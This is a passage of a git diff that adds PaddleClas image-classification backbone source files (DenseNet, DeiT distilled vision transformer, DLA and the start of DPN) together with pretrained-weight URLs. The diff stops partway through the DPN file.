b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/densenet.py new file mode 100644 index 0000000..7e6e202 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/densenet.py @@ -0,0 +1,344 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "DenseNet121": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DenseNet121_pretrained.pdparams", + "DenseNet161": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DenseNet161_pretrained.pdparams", + "DenseNet169": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DenseNet169_pretrained.pdparams", + "DenseNet201": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DenseNet201_pretrained.pdparams", + "DenseNet264": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DenseNet264_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class BNACConvLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + pad=0, + groups=1, + act="relu", + name=None): + super(BNACConvLayer, self).__init__() + + self._batch_norm = BatchNorm( + num_channels, + act=act, + param_attr=ParamAttr(name=name + '_bn_scale'), + bias_attr=ParamAttr(name + '_bn_offset'), + moving_mean_name=name + '_bn_mean', + moving_variance_name=name + '_bn_variance') + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=pad, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + + def forward(self, input): + y = self._batch_norm(input) + y = self._conv(y) + return y + + +class DenseLayer(nn.Layer): + def __init__(self, num_channels, growth_rate, bn_size, dropout, name=None): + super(DenseLayer, self).__init__() + self.dropout = dropout + + self.bn_ac_func1 = BNACConvLayer( + num_channels=num_channels, + num_filters=bn_size * growth_rate, + filter_size=1, + pad=0, + stride=1, + name=name + "_x1") + + self.bn_ac_func2 = BNACConvLayer( + num_channels=bn_size * growth_rate, + num_filters=growth_rate, + filter_size=3, + pad=1, + stride=1, + name=name + "_x2") + + if dropout: + self.dropout_func = Dropout(p=dropout, mode="downscale_in_infer") + + def forward(self, input): + conv = self.bn_ac_func1(input) + conv = self.bn_ac_func2(conv) + if self.dropout: + conv = self.dropout_func(conv) + conv = paddle.concat([input, conv], axis=1) + return conv + + +class DenseBlock(nn.Layer): + def __init__(self, + num_channels, + num_layers, + bn_size, + growth_rate, + dropout, + name=None): + super(DenseBlock, self).__init__() + self.dropout = dropout + + self.dense_layer_func = [] + + pre_channel = num_channels + for layer in range(num_layers): + self.dense_layer_func.append( + self.add_sublayer( + "{}_{}".format(name, layer + 1), + DenseLayer( + num_channels=pre_channel, + growth_rate=growth_rate, + bn_size=bn_size, + dropout=dropout, + name=name + '_' + str(layer + 1)))) + pre_channel = pre_channel + growth_rate + + def forward(self, input): + conv = input + for func in self.dense_layer_func: + conv = func(conv) + return conv + + +class TransitionLayer(nn.Layer): + def __init__(self, num_channels, num_output_features, name=None): + super(TransitionLayer, self).__init__() + + self.conv_ac_func = BNACConvLayer( + num_channels=num_channels, + num_filters=num_output_features, + filter_size=1, + pad=0, + stride=1, + name=name) + + self.pool2d_avg = AvgPool2D(kernel_size=2, stride=2, padding=0) + + def forward(self, input): + y = self.conv_ac_func(input) + y = self.pool2d_avg(y) + return y + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + pad=0, + groups=1, + act="relu", + name=None): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=pad, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=name + '_bn_scale'), + bias_attr=ParamAttr(name + '_bn_offset'), + moving_mean_name=name + '_bn_mean', + moving_variance_name=name + '_bn_variance') + + def forward(self, input): + y = self._conv(input) + y = self._batch_norm(y) + return y + + +class DenseNet(nn.Layer): + def __init__(self, layers=60, bn_size=4, dropout=0, class_num=1000): + super(DenseNet, self).__init__() + + supported_layers = [121, 161, 169, 201, 264] + assert layers in supported_layers, \ + "supported layers are {} but input layer is {}".format( + supported_layers, layers) + densenet_spec = { + 121: (64, 32, [6, 12, 24, 16]), + 161: (96, 48, [6, 12, 36, 24]), + 169: (64, 32, [6, 12, 32, 32]), + 201: (64, 32, [6, 12, 48, 32]), + 264: (64, 32, [6, 12, 64, 48]) + } + num_init_features, growth_rate, block_config = densenet_spec[layers] + + self.conv1_func = ConvBNLayer( + num_channels=3, + num_filters=num_init_features, + filter_size=7, + stride=2, + pad=3, + act='relu', + name="conv1") + + self.pool2d_max = MaxPool2D(kernel_size=3, stride=2, padding=1) + + self.block_config = block_config + + self.dense_block_func_list = [] + self.transition_func_list = [] + pre_num_channels = num_init_features + num_features = num_init_features + for i, num_layers in enumerate(block_config): + self.dense_block_func_list.append( + self.add_sublayer( + "db_conv_{}".format(i + 2), + DenseBlock( + num_channels=pre_num_channels, + num_layers=num_layers, + bn_size=bn_size, + growth_rate=growth_rate, + dropout=dropout, + name='conv' + str(i + 2)))) + + num_features = num_features + num_layers * growth_rate + pre_num_channels = num_features + + if i != len(block_config) - 1: + self.transition_func_list.append( + self.add_sublayer( + "tr_conv{}_blk".format(i + 2), + TransitionLayer( + num_channels=pre_num_channels, + num_output_features=num_features // 2, + name='conv' + str(i + 2) + "_blk"))) + pre_num_channels = num_features // 2 + num_features = num_features // 2 + + self.batch_norm = BatchNorm( + num_features, + act="relu", + param_attr=ParamAttr(name='conv5_blk_bn_scale'), + bias_attr=ParamAttr(name='conv5_blk_bn_offset'), + moving_mean_name='conv5_blk_bn_mean', + moving_variance_name='conv5_blk_bn_variance') + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + stdv = 1.0 / math.sqrt(num_features * 1.0) + + self.out = Linear( + num_features, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc_weights"), + bias_attr=ParamAttr(name="fc_offset")) + + def forward(self, input): + conv = self.conv1_func(input) + conv = self.pool2d_max(conv) + + for i, num_layers in enumerate(self.block_config): + conv = self.dense_block_func_list[i](conv) + if i != len(self.block_config) - 1: + conv = self.transition_func_list[i](conv) + + conv = self.batch_norm(conv) + y = self.pool2d_avg(conv) + y = paddle.flatten(y, start_axis=1, stop_axis=-1) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def DenseNet121(pretrained=False, use_ssld=False, **kwargs): + model = DenseNet(layers=121, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["DenseNet121"], use_ssld=use_ssld) + return model + + +def DenseNet161(pretrained=False, use_ssld=False, **kwargs): + model = DenseNet(layers=161, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["DenseNet161"], use_ssld=use_ssld) + return model + + +def DenseNet169(pretrained=False, use_ssld=False, **kwargs): + model = DenseNet(layers=169, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["DenseNet169"], use_ssld=use_ssld) + return model + + +def DenseNet201(pretrained=False, use_ssld=False, **kwargs): + model = DenseNet(layers=201, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["DenseNet201"], use_ssld=use_ssld) + return model + + +def DenseNet264(pretrained=False, use_ssld=False, **kwargs): + model = DenseNet(layers=264, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["DenseNet264"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/distilled_vision_transformer.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/distilled_vision_transformer.py new file mode 100644 index 0000000..025d361 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/distilled_vision_transformer.py @@ -0,0 +1,270 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import paddle +import paddle.nn as nn +from .vision_transformer import VisionTransformer, Identity, trunc_normal_, zeros_ + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "DeiT_tiny_patch16_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DeiT_tiny_patch16_224_pretrained.pdparams", + "DeiT_small_patch16_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DeiT_small_patch16_224_pretrained.pdparams", + "DeiT_base_patch16_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DeiT_base_patch16_224_pretrained.pdparams", + "DeiT_tiny_distilled_patch16_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DeiT_tiny_distilled_patch16_224_pretrained.pdparams", + "DeiT_small_distilled_patch16_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DeiT_small_distilled_patch16_224_pretrained.pdparams", + "DeiT_base_distilled_patch16_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DeiT_base_distilled_patch16_224_pretrained.pdparams", + "DeiT_base_patch16_384": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DeiT_base_patch16_384_pretrained.pdparams", + "DeiT_base_distilled_patch16_384": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DeiT_base_distilled_patch16_384_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class DistilledVisionTransformer(VisionTransformer): + def __init__(self, + img_size=224, + patch_size=16, + class_num=1000, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + qkv_bias=False, + norm_layer='nn.LayerNorm', + epsilon=1e-5, + **kwargs): + super().__init__( + img_size=img_size, + patch_size=patch_size, + class_num=class_num, + embed_dim=embed_dim, + depth=depth, + num_heads=num_heads, + mlp_ratio=mlp_ratio, + qkv_bias=qkv_bias, + norm_layer=norm_layer, + epsilon=epsilon, + **kwargs) + self.pos_embed = self.create_parameter( + shape=(1, self.patch_embed.num_patches + 2, self.embed_dim), + default_initializer=zeros_) + self.add_parameter("pos_embed", self.pos_embed) + + self.dist_token = self.create_parameter( + shape=(1, 1, self.embed_dim), default_initializer=zeros_) + self.add_parameter("cls_token", self.cls_token) + + self.head_dist = nn.Linear( + self.embed_dim, + self.class_num) if self.class_num > 0 else Identity() + + trunc_normal_(self.dist_token) + trunc_normal_(self.pos_embed) + self.head_dist.apply(self._init_weights) + + def forward_features(self, x): + B = paddle.shape(x)[0] + x = self.patch_embed(x) + + cls_tokens = self.cls_token.expand((B, -1, -1)) + dist_token = self.dist_token.expand((B, -1, -1)) + x = paddle.concat((cls_tokens, dist_token, x), axis=1) + + x = x + self.pos_embed + x = self.pos_drop(x) + + for blk in self.blocks: + x = blk(x) + + x = self.norm(x) + return x[:, 0], x[:, 1] + + def forward(self, x): + x, x_dist = self.forward_features(x) + x = self.head(x) + x_dist = self.head_dist(x_dist) + return (x + x_dist) / 2 + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def DeiT_tiny_patch16_224(pretrained=False, use_ssld=False, **kwargs): + model = VisionTransformer( + patch_size=16, + embed_dim=192, + depth=12, + num_heads=3, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["DeiT_tiny_patch16_224"], + use_ssld=use_ssld) + return model + + +def DeiT_small_patch16_224(pretrained=False, use_ssld=False, **kwargs): + model = VisionTransformer( + patch_size=16, + embed_dim=384, + depth=12, + num_heads=6, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["DeiT_small_patch16_224"], + use_ssld=use_ssld) + return model + + +def DeiT_base_patch16_224(pretrained=False, use_ssld=False, **kwargs): + model = VisionTransformer( + patch_size=16, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["DeiT_base_patch16_224"], + use_ssld=use_ssld) + return model + + +def DeiT_tiny_distilled_patch16_224(pretrained=False, use_ssld=False, + **kwargs): + model = DistilledVisionTransformer( + patch_size=16, + embed_dim=192, + depth=12, + num_heads=3, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["DeiT_tiny_distilled_patch16_224"], + use_ssld=use_ssld) + return model + + +def DeiT_small_distilled_patch16_224(pretrained=False, + use_ssld=False, + **kwargs): + model = DistilledVisionTransformer( + patch_size=16, + embed_dim=384, + depth=12, + num_heads=6, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["DeiT_small_distilled_patch16_224"], + use_ssld=use_ssld) + return model + + +def DeiT_base_distilled_patch16_224(pretrained=False, use_ssld=False, + **kwargs): + model = DistilledVisionTransformer( + patch_size=16, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["DeiT_base_distilled_patch16_224"], + use_ssld=use_ssld) + return model + + +def DeiT_base_patch16_384(pretrained=False, use_ssld=False, **kwargs): + model = VisionTransformer( + img_size=384, + patch_size=16, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["DeiT_base_patch16_384"], + use_ssld=use_ssld) + return model + + +def DeiT_base_distilled_patch16_384(pretrained=False, use_ssld=False, + **kwargs): + model = DistilledVisionTransformer( + img_size=384, + patch_size=16, + embed_dim=768, + depth=12, + num_heads=12, + mlp_ratio=4, + qkv_bias=True, + epsilon=1e-6, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["DeiT_base_distilled_patch16_384"], + use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/dla.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/dla.py new file mode 100644 index 0000000..669055a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/dla.py @@ -0,0 +1,526 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import math + +import paddle +import paddle.nn as nn +import paddle.nn.functional as F + +from paddle.nn.initializer import Normal, Constant + +from ppcls.arch.backbone.base.theseus_layer import Identity +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "DLA34": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA34_pretrained.pdparams", + "DLA46_c": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA46_c_pretrained.pdparams", + "DLA46x_c": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA46x_c_pretrained.pdparams", + "DLA60": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA60_pretrained.pdparams", + "DLA60x": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA60x_pretrained.pdparams", + "DLA60x_c": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA60x_c_pretrained.pdparams", + "DLA102": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA102_pretrained.pdparams", + "DLA102x": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA102x_pretrained.pdparams", + "DLA102x2": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA102x2_pretrained.pdparams", + "DLA169": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DLA169_pretrained.pdparams" +} + +__all__ = MODEL_URLS.keys() + +zeros_ = Constant(value=0.) +ones_ = Constant(value=1.) + + +class DlaBasic(nn.Layer): + def __init__(self, inplanes, planes, stride=1, dilation=1, **cargs): + super(DlaBasic, self).__init__() + self.conv1 = nn.Conv2D( + inplanes, + planes, + kernel_size=3, + stride=stride, + padding=dilation, + bias_attr=False, + dilation=dilation) + self.bn1 = nn.BatchNorm2D(planes) + self.relu = nn.ReLU() + self.conv2 = nn.Conv2D( + planes, + planes, + kernel_size=3, + stride=1, + padding=dilation, + bias_attr=False, + dilation=dilation) + self.bn2 = nn.BatchNorm2D(planes) + self.stride = stride + + def forward(self, x, residual=None): + if residual is None: + residual = x + + out = self.conv1(x) + out = self.bn1(out) + out = self.relu(out) + + out = self.conv2(out) + out = self.bn2(out) + + out += residual + out = self.relu(out) + + return out + + +class DlaBottleneck(nn.Layer): + expansion = 2 + + def __init__(self, + inplanes, + outplanes, + stride=1, + dilation=1, + cardinality=1, + base_width=64): + super(DlaBottleneck, self).__init__() + self.stride = stride + mid_planes = int( + math.floor(outplanes * (base_width / 64)) * cardinality) + mid_planes = mid_planes // self.expansion + + self.conv1 = nn.Conv2D( + inplanes, mid_planes, kernel_size=1, bias_attr=False) + self.bn1 = nn.BatchNorm2D(mid_planes) + self.conv2 = nn.Conv2D( + mid_planes, + mid_planes, + kernel_size=3, + stride=stride, + padding=dilation, + bias_attr=False, + dilation=dilation, + groups=cardinality) + self.bn2 = nn.BatchNorm2D(mid_planes) + self.conv3 = nn.Conv2D( + mid_planes, outplanes, kernel_size=1, bias_attr=False) + self.bn3 = nn.BatchNorm2D(outplanes) + self.relu = nn.ReLU() + + def forward(self, x, residual=None): + if residual is None: + residual = x + + out = self.conv1(x) + out = self.bn1(out) + out = self.relu(out) + + out = self.conv2(out) + out = self.bn2(out) + out = self.relu(out) + + out = self.conv3(out) + out = self.bn3(out) + + out += residual + out = self.relu(out) + + return out + + +class DlaRoot(nn.Layer): + def __init__(self, in_channels, out_channels, kernel_size, residual): + super(DlaRoot, self).__init__() + self.conv = nn.Conv2D( + in_channels, + out_channels, + 1, + stride=1, + bias_attr=False, + padding=(kernel_size - 1) // 2) + self.bn = nn.BatchNorm2D(out_channels) + self.relu = nn.ReLU() + self.residual = residual + + def forward(self, *x): + children = x + x = self.conv(paddle.concat(x, 1)) + x = self.bn(x) + if self.residual: + x += children[0] + x = self.relu(x) + + return x + + +class DlaTree(nn.Layer): + def __init__(self, + levels, + block, + in_channels, + out_channels, + stride=1, + dilation=1, + cardinality=1, + base_width=64, + level_root=False, + root_dim=0, + root_kernel_size=1, + root_residual=False): + super(DlaTree, self).__init__() + if root_dim == 0: + root_dim = 2 * out_channels + if level_root: + root_dim += in_channels + + self.downsample = nn.MaxPool2D( + stride, stride=stride) if stride > 1 else Identity() + self.project = Identity() + cargs = dict( + dilation=dilation, cardinality=cardinality, base_width=base_width) + + if levels == 1: + self.tree1 = block(in_channels, out_channels, stride, **cargs) + self.tree2 = block(out_channels, out_channels, 1, **cargs) + if in_channels != out_channels: + self.project = nn.Sequential( + nn.Conv2D( + in_channels, + out_channels, + kernel_size=1, + stride=1, + bias_attr=False), + nn.BatchNorm2D(out_channels)) + else: + cargs.update( + dict( + root_kernel_size=root_kernel_size, + root_residual=root_residual)) + self.tree1 = DlaTree( + levels - 1, + block, + in_channels, + out_channels, + stride, + root_dim=0, + **cargs) + self.tree2 = DlaTree( + levels - 1, + block, + out_channels, + out_channels, + root_dim=root_dim + out_channels, + **cargs) + + if levels == 1: + self.root = DlaRoot(root_dim, out_channels, root_kernel_size, + root_residual) + + self.level_root = level_root + self.root_dim = root_dim + self.levels = levels + + def forward(self, x, residual=None, children=None): + children = [] if children is None else children + bottom = self.downsample(x) + residual = self.project(bottom) + + if self.level_root: + children.append(bottom) + x1 = self.tree1(x, residual) + + if self.levels == 1: + x2 = self.tree2(x1) + x = self.root(x2, x1, *children) + else: + children.append(x1) + x = self.tree2(x1, children=children) + return x + + +class DLA(nn.Layer): + def __init__(self, + levels, + channels, + in_chans=3, + cardinality=1, + base_width=64, + block=DlaBottleneck, + residual_root=False, + drop_rate=0.0, + class_num=1000, + with_pool=True): + super(DLA, self).__init__() + self.channels = channels + self.class_num = class_num + self.with_pool = with_pool + self.cardinality = cardinality + self.base_width = base_width + self.drop_rate = drop_rate + + self.base_layer = nn.Sequential( + nn.Conv2D( + in_chans, + channels[0], + kernel_size=7, + stride=1, + padding=3, + bias_attr=False), + nn.BatchNorm2D(channels[0]), + nn.ReLU()) + + self.level0 = self._make_conv_level(channels[0], channels[0], + levels[0]) + self.level1 = self._make_conv_level( + channels[0], channels[1], levels[1], stride=2) + + cargs = dict( + cardinality=cardinality, + base_width=base_width, + root_residual=residual_root) + + self.level2 = DlaTree( + levels[2], + block, + channels[1], + channels[2], + 2, + level_root=False, + **cargs) + self.level3 = DlaTree( + levels[3], + block, + channels[2], + channels[3], + 2, + level_root=True, + **cargs) + self.level4 = DlaTree( + levels[4], + block, + channels[3], + channels[4], + 2, + level_root=True, + **cargs) + self.level5 = DlaTree( + levels[5], + block, + channels[4], + channels[5], + 2, + level_root=True, + **cargs) + + self.feature_info = [ + # rare to have a meaningful stride 1 level + dict( + num_chs=channels[0], reduction=1, module='level0'), + dict( + num_chs=channels[1], reduction=2, module='level1'), + dict( + num_chs=channels[2], reduction=4, module='level2'), + dict( + num_chs=channels[3], reduction=8, module='level3'), + dict( + num_chs=channels[4], reduction=16, module='level4'), + dict( + num_chs=channels[5], reduction=32, module='level5'), + ] + + self.num_features = channels[-1] + + if with_pool: + self.global_pool = nn.AdaptiveAvgPool2D(1) + + if class_num > 0: + self.fc = nn.Conv2D(self.num_features, class_num, 1) + + for m in self.sublayers(): + if isinstance(m, nn.Conv2D): + n = m._kernel_size[0] * m._kernel_size[1] * m._out_channels + normal_ = Normal(mean=0.0, std=math.sqrt(2. / n)) + normal_(m.weight) + elif isinstance(m, nn.BatchNorm2D): + ones_(m.weight) + zeros_(m.bias) + + def _make_conv_level(self, inplanes, planes, convs, stride=1, dilation=1): + modules = [] + for i in range(convs): + modules.extend([ + nn.Conv2D( + inplanes, + planes, + kernel_size=3, + stride=stride if i == 0 else 1, + padding=dilation, + bias_attr=False, + dilation=dilation), nn.BatchNorm2D(planes), nn.ReLU() + ]) + inplanes = planes + return nn.Sequential(*modules) + + def forward_features(self, x): + x = self.base_layer(x) + + x = self.level0(x) + x = self.level1(x) + x = self.level2(x) + x = self.level3(x) + x = self.level4(x) + x = self.level5(x) + + return x + + def forward(self, x): + x = self.forward_features(x) + + if self.with_pool: + x = self.global_pool(x) + + if self.drop_rate > 0.: + x = F.dropout(x, p=self.drop_rate, training=self.training) + + if self.class_num > 0: + x = self.fc(x) + x = x.flatten(1) + + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def DLA34(pretrained=False, **kwargs): + model = DLA(levels=(1, 1, 1, 2, 2, 1), + channels=(16, 32, 64, 128, 256, 512), + block=DlaBasic, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["DLA34"]) + return model + + +def DLA46_c(pretrained=False, **kwargs): + model = DLA(levels=(1, 1, 1, 2, 2, 1), + channels=(16, 32, 64, 64, 128, 256), + block=DlaBottleneck, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["DLA46_c"]) + return model + + +def DLA46x_c(pretrained=False, **kwargs): + model = DLA(levels=(1, 1, 1, 2, 2, 1), + channels=(16, 32, 64, 64, 128, 256), + block=DlaBottleneck, + cardinality=32, + base_width=4, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["DLA46x_c"]) + return model + + +def DLA60(pretrained=False, **kwargs): + model = DLA(levels=(1, 1, 1, 2, 3, 1), + channels=(16, 32, 128, 256, 512, 1024), + block=DlaBottleneck, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["DLA60"]) + return model + + +def DLA60x(pretrained=False, **kwargs): + model = DLA(levels=(1, 1, 1, 2, 3, 1), + channels=(16, 32, 128, 256, 512, 1024), + block=DlaBottleneck, + cardinality=32, + base_width=4, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["DLA60x"]) + return model + + +def DLA60x_c(pretrained=False, **kwargs): + model = DLA(levels=(1, 1, 1, 2, 3, 1), + channels=(16, 32, 64, 64, 128, 256), + block=DlaBottleneck, + cardinality=32, + base_width=4, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["DLA60x_c"]) + return model + + +def DLA102(pretrained=False, **kwargs): + model = DLA(levels=(1, 1, 1, 3, 4, 1), + channels=(16, 32, 128, 256, 512, 1024), + block=DlaBottleneck, + residual_root=True, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["DLA102"]) + return model + + +def DLA102x(pretrained=False, **kwargs): + model = DLA(levels=(1, 1, 1, 3, 4, 1), + channels=(16, 32, 128, 256, 512, 1024), + block=DlaBottleneck, + cardinality=32, + base_width=4, + residual_root=True, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["DLA102x"]) + return model + + +def DLA102x2(pretrained=False, **kwargs): + model = DLA(levels=(1, 1, 1, 3, 4, 1), + channels=(16, 32, 128, 256, 512, 1024), + block=DlaBottleneck, + cardinality=64, + base_width=4, + residual_root=True, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["DLA102x2"]) + return model + + +def DLA169(pretrained=False, **kwargs): + model = DLA(levels=(1, 1, 2, 3, 5, 1), + channels=(16, 32, 128, 256, 512, 1024), + block=DlaBottleneck, + residual_root=True, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["DLA169"]) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/dpn.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/dpn.py new file mode 100644 index 0000000..55953ed --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/dpn.py @@ -0,0 +1,451 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import sys +import paddle +from paddle import ParamAttr +import paddle.nn as nn +from paddle.nn import Conv2D, BatchNorm, Linear +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "DPN68": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DPN68_pretrained.pdparams", + "DPN92": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DPN92_pretrained.pdparams", + "DPN98": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DPN98_pretrained.pdparams", + "DPN107": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DPN107_pretrained.pdparams", + "DPN131": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/DPN131_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + pad=0, + groups=1, + act="relu", + name=None): + super(ConvBNLayer, self).__init__() + + self._conv = 